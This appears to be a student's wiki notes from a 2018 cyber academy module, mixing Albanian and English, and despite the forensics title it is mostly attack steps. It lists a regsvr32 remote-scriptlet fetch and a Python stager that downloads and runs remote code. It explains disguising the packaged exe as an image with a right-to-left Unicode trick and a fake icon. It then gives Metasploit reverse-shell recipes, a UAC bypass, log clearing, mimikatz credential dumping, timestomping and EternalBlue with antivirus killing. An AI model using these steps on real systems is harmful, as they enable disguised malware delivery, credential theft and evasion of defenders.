dardan:cyberacademy:module-9-linux_and_windows_forensics
rdesktop -g 1280x1024 172.16.50.96
=== || === || === || === || === || === || || 03.12.2018 java 3-te ne cyber || === || === || === || === || === || === || OSF forensics - tool per forensics
=== || === || === || === || === || === || || 05.12.2018 || === || === || === || === || === || === || sjam kon
=== || === || === || === || === || === || || 07.12.2018 || === || === || === || === || === || === || sjam kon
=== || === || === || === || === || === ||
|| 10.12.2018 ||
=== || === || === || === || === || === ||
me setup malware reverse per:
regsvr32 /s /n /u /i:http://172.16.65.141:8080/.sct scrobj.dll
task schedule
run persistence (ne metasploit)
me kriju malware ne GO platform apo gjuhe
right to left unicode
jpg to ico #online convert
change file icon with malware icon file created
installing python in windows:
download .exe or .msi
install
setup variables in windows:
ne system properties,
advanced, enviroment variables
system variables, path(;C:\Python27)
install pip:
cd C:\Python27\Scripts
pip.exe install pyinstaller | dir | check if pip.exe install pyinstaller is there
setup variables in windows:
ne system properties,
advanced, enviroment variables
system variables, edit variable value: ;C:\Python27\;C:\Python27\Scripts
cd C:\Users\Lab\Desktop
pyinstaller --onefile mlw.py --icon img.ico
copy right to left symbol from character map
rename mlw.exe to mlwgnp.exe than paste character in front of png.exe #e ktehn ne mlwexe.png
C:/python2.7\Tools\scripts> --ico
msf > use exploit/multi/script/web_delivery
>show targets
> set target 0
> set payload python/meterpreter/reverese_tcp
> set lhost 172.16.65.141
> set uripath /
> exploit
te nje terminal i ri
../ #to execute
na jep session :)
edito mlw.py
import sys
import urllib2
r=urllib2.urlopen("http://172.16.60.99:8080/")
exec(r.read())
me transferu ne windows: python -m SimpleHTTPServer 80
C:>python mlw.py #te jep session
##now compile to exe
c:>pyinstaller --onefile mlw.py
wget http://172.16.60.99:8080
echo "paste content of index.html | base64 -d
copy content of script found
nano mlw2.py / paste script here
python mlw2.py / te jep session
cp to /var/www
copy to windows
pyinstaller --onefile mlw2.py #from location where file is downloaded
cd dist
mlw2.exe #to execute ##error kur execute ne windows, script problem
fuser -k 80/tcp
msf > use exploit/multi/script/web_delivery
>show targets
> set target 3
> set lhost 172.16.65.141
> set uripath /
> set payload windows/meterpreter/reverse_tcp
> exploit
sessions
sessionons -i
getuid
run persistence --help
> use exploit/multi/handler
=== || === || === || === || === || === || 12.12.2018 || === || === || === || === || === || === || ## me marr session me metasploit permes PHP use multi/script/web_delivery show targets set target 1 set lhost xx set payload php/meterpreter/reverse_tcp set uripath / exploit ##generate some output string ne new terminal execute php -d "script" te vjen sessioni :) ##debug qa po ndodh **single stage attack nano info.txt paste script wget http://172.16.50.161:8080/ cat index.html mv index.html index.php firefox http://127.0.0.1/ te vjen session :) session -i sessions -k 2 ============================== ## me marr session me metasploit permes PSH set target 2 show options set payload windows/meterpreter/reverse_tcp show option jobs -k exploit /e gjeneron nje link nano file / paste the link nano index.html /paste the url browse 172.16.50.161 /copy the link ne cmd paste the link :) te jep session sessions -i x getuid >run post/windoes/manage/enable_rdp >run post/windoes/manage/ meny options ======================================== ##payload_inject ## nje session existues e duplifikon > use exploit multi/handler > set payload windows/meterpreter/reverse_tcp > set lport xx > set lhost xx > exploit -j #silent meterpreter> background > run post/windows/manage/payload_inject > set payload windows/meterpreter/reverse_tcp > set lport xx > set lhost xx > set session x > exploit :) e duplikon session meterpreter> getuid meterpreter> shell meterpreter> background > user exploit/windows/local/bypassuac > set session 1 > exploit > set lport xx > show advanced > exploit :) te jep session meterpreter> getuid meterpreter> getsystem meterpreter> getuid meterpreter>show_mount meterpreter> ps #process liste ##clearing the logs and important of logs meterpreter> clearev #clear logs ## me lexu ne memory, read live credentials meterpreter> kiwi ## explore the tool, similar mimikatz meterpreter> lsa_dump_sam meterpreter> load mimikatz ## important of time file used and file time modified meterpreter>timwstomp nc.exe ##find files recently accessed, it modified the time used **siem analyze **malware analyses **behavior analyses ## ask injection meterpreter> > user exploit/win/local/ask >set lhost >set lport >exploit meterpreter> getuid meterpreter> getsystem >exploit ======================================== ##Unicorn.py python unicorn.py windows/meterpreter/reverse_tcp 172.16.59.161 666 macro msfconsole -r unicorn.rc cat powershell_attack.txt
=== || === || === || === || === || === || || 14.12.2018 || === || === || === || === || === || === || ## malware of the future ## AI ## polymorphic malware, to read during holiday ## autorun script resource ## me lexu prej nje file ne msfconsole eternalblue use exploit/windows/smb/ms17_010_eternalblue set payload/windows/x64/meterpreter/reverse_tcp set rhost IP set lport port use exploit/multi/handler set ExitOnSession false set PAYLOAD windows/meterpreter/reverse_tcp set EXITFUNC thread set LHOST localhost set LPORT 4445 set AutoRunScript post/windows/manage/killav exploit -j msf > use exploit/multi/script/web_delivery > set TARGET 3 > set PAYLOAD windows/meterpreter/reverse_tcp > set LHOST > show options > exploit session -c "command" session -c "whoami"
dardan/cyberacademy/module-9-linux_and_windows_forensics.txt · Last modified: 2019/02/04 17:32 by dardan